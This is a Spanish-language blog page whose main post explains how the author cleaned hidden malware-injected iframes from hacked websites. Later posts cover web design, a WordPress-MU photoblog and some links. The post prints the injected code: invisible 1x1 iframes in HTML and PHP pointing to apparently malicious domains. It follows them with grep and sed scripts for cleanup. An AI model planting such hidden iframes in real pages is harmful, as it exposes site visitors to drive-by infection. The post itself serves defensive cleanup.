Eliminación automática de iframe oculto

En este pequeño artículo describo la forma para eliminar los iframes que ciertos malware agregan a nuestro sitio para infectar otras computadoras, al parecer se trata de un virus o spyware llamado SALITY, ya que este malware se encarga de infectar archivos con extensiones .exe y .src, además de inyectar código html de un iframe en archivos HTML, PHP y ASP.

Cuando a mi me sucedió esto, estuve buscando en Internet una forma de eliminarlo automáticamente de todos mis sitios infectado, ya que desafortunadamente no contaba con un respaldo para reemplazar los archivos infectados, después de mucho buscar no la encontré, lo que encontré fue un script muy complejo y desde mi punto de vista, nada legible, además su autor no garantizaba su funcionamiento, había otra solución pero había que pagar por ella.

De acuerdo a toda la información encontrada me di cuenta que hay sitios en donde dicen que se trata de un vulnerabilidad en PHP (PHP Exploit), lo cual no es cierto, ya que esto es debido a un malware que reside en la computadora desde la cual se accede al servidor, de esta forma el malware puede acceder ya que conoce el nombre de usuario y contraseña.

Lo que hace este malware es agregar código a las páginas principales de los sitios que logra infectar, básicamente agrega iframes ocultos con referencia a sitios infectados, esto lo hace en HTML,  PHP o ASP, en archivos index, default o algunos otros considerados como principales.

En caso de HTML agrega algo como esto:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

En los casos de PHP puede realizar algo como esto:

<?php
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\"http:// xtrarobotz . com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// nipkelo .net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// internetcountercheck . com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

Como se podrá observar, el sitio referenciado puede variar, existe una lista de sitios de los cuales se sabe están infectados.

En mi caso, en mis sitios me aparecían tanto en HTML como en PHP iframes del sitio internetcountercheck.

SOLUCIÓN

Para empezar, si eres víctima de este tipo de ataque lo primero que debes de realizar es cambiar tu contraseña de tu servidor ftp, ya que esta es la forma o fue la forma en la que pudieron acceder a tu sitio para la inyección de código.

Hosting economico

También debes de hacer un análisis de tu computadora en busca de virus y cualquier malware que pudiera existir, ya que si no te deshaces del malware, no sirve de nada cambiar la contraseña, puesto que seguirás accediendo al servidor desde tu computadora infectada. Desafortunadamente, si el virus que tenemos en nuestra computadora es el SALITY lo más probable es que nuestro antivirus ya no funcione ya que estará también infectado con el sality, así que lo recomendable será instalar otro antivirus.

Una vez estés seguro de que ya no existe algún malware en tu computadora puedes proceder a la limpieza de tu sitio.

Para revisar los archivos realicé el siguiente script del shell:

1: for i in `find .`; do
2:       if grep -q “<iframe” $i; then
3:          echo “Archivo” $i >> salida.txt
4:          grep -n “<iframe” $i >> salida.txt
5:       fi
6: done

Para aquellos que no conocen mucho acerca de esto, explico brevemente lo que se está realizando:

Línea 1: Enlista todos los archivos comenzando en el directorio actual (Esta instrucción puede ser cambiada por alguna equivalente como ls -R).

Línea 2: Para cada archivo encontrado, revisa si existe la cadena “<iframe”.

En caso de haber encontrado la cadena “<iframe” en algún archivo

Línea 3: Escribe al archivo salida.txt la ruta y el nombre del archivo con la cadena.

Línea 4: Escribe al archivo salida.txt el número de la línea en que fue encontrada la cadena e inmediatamente después escribe el contenido de la línea.

Eso me sirvió para encontrar los archivos que contengan iframes, debido a que este script realiza una búsqueda exhaustiva, puede tardar dependiendo de la cantidad de archivos en tu sitio web, en mi caso tardo al rededor de 2 minutos en un servidor que tiene 7 sitios web. En el archivo salida.txt se pueden observar los resultados, el nombre del archivo, así como la línea donde se encuentra el iframe. Eso sirve para observar cierto comportamiento y al momento de eliminar sea más rápido.

En mi caso, como utilizo iframes de otros sitios, me daban resultados diferentes, pero de los iframes que no eran mios los identifiqué con la URL del sitio internetcountercheck.com por lo que para el proceso de eliminación utilicé el siguiente script:

1: for i in `find .  |grep index`; do
2:       if grep “internetcountercheck” $i; then
3:          echo “Removiendo de ” $i
4:          sed ‘s/[echo “]*<iframe src=[\\]*”http:\/\/internetcounter[^>]*>[\w]*<\/iframe>[“;]*//g’ $i > $i.tmp
5:          mv $i.tmp $i
6:       fi
7: done
8: rm salida.txt

Explicación de el script:

Línea 1: Enlista todos los archivos de tipo index, esto es porque en mi caso únicamente encontré archivos index con iframe, pero también se pueden encontrar archivos default u otros, en ese caso es recomendable cambiar el script y reemplazar index por el nombre según sea necesario.

Línea 2: Busca archivos que contengan la cadena “internetcountercheck” (Esta puede ser cambiada por la cadena que se encuentre en tus archivos o en caso de que no manejes iframes puede quedarse la cadena”<iframe”)

Línea 3: Indica el archivo de donde se eliminará el iframe

Línea 4: Esta es la línea importante, ya que es aquí en donde se elimina el código malicioso. La cadena que cambiaste en la línea 2 por la cadena “internetcountercheck” deberás de cambiarla también en esta línea. En caso de que no manejaras iframes en tu sitio y que desees que se eliminen todos los iframes que existan la línea 4 puede ser substituida por esta:

4:          sed ‘s/[echo “]*<iframe[^>]*>[\w]*<\/iframe>[“;]*//g’ $i > $i.tmp

Línea 5: Debido a que el resultado de la línea 4 se almacena en otro archivo, se renombra el archivo temporal con el nombre original.

Línea 8: Al final se elimina el archivo salida.txt, esto es para que se vuelva a ejecutar el script que busca el código malicioso y no exista la información anterior en el archivo de salida.

Con estos dos scripts quedaron limpios mis sitios.

Estos dos scripts se pueden ejecutar desde la línea de comandos en caso de tener acceso a través de ssh, pero en la mayoría de los casos esto no es posible, así que para ello realicé 2 archivos en PHP en donde se ejecutan estos scripts.

Aquí dejo los archivos que ocupé para la eliminación de los iframe, modifícalos y adáptalos a tu caso. Una vez que hayas descomprimido los archivos y los hayas subido a tu servidor recuerda asignar permisos de ejecución a los archivos .sh, de preferencia que tengan el valor 500. Es recomendable subir los archivos al directorio raíz de tu sitio Web, por lo general es public_html. Para poder realizar los pasos lo único que debes de hacer es ingresar desde un navegador de la siguiente forma:

http://tudominio.terminacion/buscapalabra.php

http://tudominio.terminacion/eliminaiframe.php

Habiendo adaptado a tus necesidades los scripts

Descarga los Scripts

Espero les sirva a muchos así como a mi me ha funcionado y en caso de que lleguen a tener problemas con los scripts, expongan sus dudas para que sean aclaradas.

Diseño de Páginas Web

Este es un proyecto para el diseño de páginas Web a bajo costo, lo que se pretende es que todo aquel que posea un negocio o pequeña empresa, pueda tener su sitio en Internet a un precio muy bajo.

Así mismo, para aquellos profesionistas que ejercen su profesión, que apenas están comenzando o que están por comenzar, se anuncien en Internet para que se den a conocer a nivel mundial.

Pero este proyecto no sólo está limitado a esto, sino que también es para aquellas personas que tienen un oficio, puedan anunciar su forma de trabajar o puedan exponer su trabajo terminado.

También va enfocado a aquellas personas que tengan un evento o que vayan a tener un evento y que no sólo se limiten al recuerdo de su evento a través de las clásicas fotografías o video, sino que también puedan compartirlo con todos sus familiares y amigos a través de Internet, desde los preparativos del evento, hasta la presentación del mismo.

Los precios van desde los $300.00 MNX (menos de $30 USD) anuales donde se incluyen sitios Web con varias secciones, de acuerdo a las necesidades de los usuarios. Además del bajo costo, se usa la tecnología de los mapas de google para poner la ubicación exácta del negocio, empresa, profesionista, trabajador o evento; así mismo se pone una breve descripción de las formas de como llegar para que la gente encuentre más fácil y rápido lo que busca.

Tal vez se pudiera pensar que al estar ofreciendo el diseño de sitios Web a bajo costo, el trabajo final será algo muy sencillo y que no vale la pena. Pero no es así, todos los trabajos se realizan de manera profesional con gente que conoce de herramientas de última generación, de esta forma se puede entregar un trabajo óptimo, para ser encontrado con facilidad por los motores de búsqueda, presentable, agradable a la vista, y lo que es más importante, agradable a la vista del cliente como de los visitantes.

Además, a diferencia de otros, se ofrece atención a cliente y soporte vía telefónica, por correo electrónico y vía chat para una mejor atención a los clientes, esto depende del tipo de plan contratado.

Para más información se puede acceder desde las siguientes direcciones:

En resumen, todo aquel que quiera un sitio Web, lo puede obtener por menos de $1.00 MNX diario.

Busquenos En Internet

  • ¿Quieres comprar un auto, rentar un departamento o casa?
  • ¿Requieres de algún servicio profesional?
  • ¿Buscas una tienda, oficina o empresa?

Buscalos En Internet

Anunciate de forma gratuita y permite que los demás te busquen en Internet para ofrecerles tus productos y/o servicios.

Published in: on mayo 23, 2009 at 12:35 am  Comments (1)  
Tags: , , ,

Tapicería Campos

Este es un sitio sencillo para una tapicería ubicada en Guadalupe Nuevo León.

Tapiceria Campos

Se pretende a futuro ir agregando imágenes y animaciones del trabajo realizado en esta tapicería para comparar el antes y después de los productos.

Published in: on febrero 21, 2009 at 8:48 pm  Dejar un comentario  
Tags: ,

Fotoblog con WordPress-MU

Para este nuevo proyecto hay que dirigirse a la página de wordpress mu y descargar la última versión.

Los archivos se suben al servidor de nuestra preferencia y hay que seguir las instrucciones que vienen en al archivo readme.txt.

A diferencia de wordpress, aquí no se hace ninguna modificación a ningún archivo, como el wp-config.php, todo se deja intacto. En mi caso, tuve que borrar todo el contenido del archivo .htaccess debido a que si contiene información, aparece un error, además me ví en la necesidad de renombrar el archivo wp-config.php, ya que causa conflicto.

Una vez realizado lo anterior, en el proceso de instalación se piden los datos de configuración como nombre de base de datos, usuario, contraseña, servidor, así como datos para la administración del sitio, en este caso una dirección de correo electrónico en la cual se enviara la contraseña. Si este paso se realiza correctamente, TENEMOS INSTALADO WORDPRESS-MU.

Para darle la funcionalidad de fotolog, en mi caso, descargué el plugin yapb (Yet Another Photo Blog), el cual lo encuentran en la página de plugins de wordpress.

Con este plugin tuve un pequeño problema, debido a que sólo estaba probado con wordpress-mu, pero revisando algunos sitios en Internet, así como la página oficial del plugin pude solucionar el problema.

Lo que hay que hacer es editar el archivo Yapb.class.php en la función function edit_publish_save_post($post_id)

Ponemos la siguiente declaración al inicio de la función para obtener el identificador del usuario.

global $user_ID;

Un poco más abajo de la función, uscamos en donde se encuentran las líneas de codigo que convierten la URL en una ruta del servidor.

$siteUrl = get_option(‘siteurl’);
if (substr($siteUrl, -1) != ‘/’) $siteUrl .= ‘/’;
$uri = substr($url, strpos($siteUrl, ‘/’, strpos($url, ‘//’)+2));

Inmediatamente agregamos la siguiente línea:

/* PARA WORDPRESS-MU*/
$uri = “/wp-content/blogs.dir/”.$user_ID.$uri;

La variable $uri nos devuelve el valor en donde se guardan los archivos si es que tuvieramos una instalación con wordpress, pero en nuestro caso, tenemos wordpress mu. En wordpress mu, los archivos se guardan dentro del directorio /wp-content/blogs.dir/ e inmediatamente después sigue un directorio con el identificador del usuario, es por eso que fue necesario incluir la primera línea, ya que con está obtenemos el identificador del usuario el cual nos indica el nombre del subdirectorio donde se guardan los archivos.

Con la modificación anterior ya podemos tener los archivos en los directorios correspondientes y podemos usar yapb con wordpress mu.

Al empezar a probar con yapb, algunas imágenes las cargaba bien y todo salía correcto, pero después comenzó a marcar errores en el archivo mu.php con la función filesize(), lo que se realizó para corregir el error fue verificar si el archivo existía con la función file_exists(), si no existe, no hace nada.

De esa forma se tiene un fotoblog con wordpress.

Lo que sigue es buscar un theme que nos guste y listo.

Para ver una demostración de lo que está realizado hasta el momento, visitar la siguiente página:

Fotoblog con wordpress mu

Published in: on abril 18, 2008 at 1:35 am  Comments (1)  
Tags: , , ,

Sonido Nautilus

Luz y sonido de Xalapa, Veracrúz con Rappers F DJ

Published in: on febrero 8, 2008 at 8:58 pm  Comments (1)  
Tags: ,

Sitios de interes

A continuación se enumeran algunas ligas de interés.
www.tiendamexico.com.mx

Tienda virtual mexicana con una variedad en productos de computo y electrónicos a un buen precio.

eventossg.com

Un sitio de eventos importantes para empresarios.

dai-sd.com

Sitio de contadores mexicanos con buenos precios y eficientes en su trabajo. Manejan ideas frescas e innovadoras para el crecimiento de sus clientes.

Se aceptan comentarios para la mejora de estos sitios.

Gracias

Published in: on febrero 8, 2008 at 7:42 pm  Dejar un comentario